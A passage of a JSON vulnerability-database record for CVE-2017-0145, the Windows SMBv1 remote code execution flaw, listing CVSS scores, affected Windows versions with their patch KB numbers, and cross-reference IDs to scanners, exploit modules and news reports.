An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-04T22:46:36", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", 
"SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-04T22:46:36", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-04T22:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012215", "KB4012213", "KB4012606", "KB4012216", "KB4012598", "KB4013198", "KB3212646", "KB4013429", "KB3213986", "KB3210720", "KBMS16-110, 3187754", "KB3210721", "KB3177186", "KB3205409", "KB4014077", "KB4012212", "KB4012217", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, 
{"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-04T22:46:36", "differentElements": ["msAffectedSoftware"], "edition": 87}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "1284c0d389f95f11f504ec06c7d067e9", "type": "mscve", 
"bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-06T08:45:17", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": 
["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-04T22:46:36", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-04T22:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012216", "KB4013198", "KB4012214", "KB3213986", "KB4012212", "KB3210721", "KB4012606", "KB4013429", "KB3210720", "KB3205409", "KB3212646", "KB4014077", "KB3205401", "KB4012215", "KB4012598", "KB4012213", "KB4012217", "KB3177186", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": 
"KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": 
""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": 
"KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-06T08:45:17", "differentElements": ["msAffectedSoftware"], "edition": 88}], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", 
"THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "qualysblog", "idList": 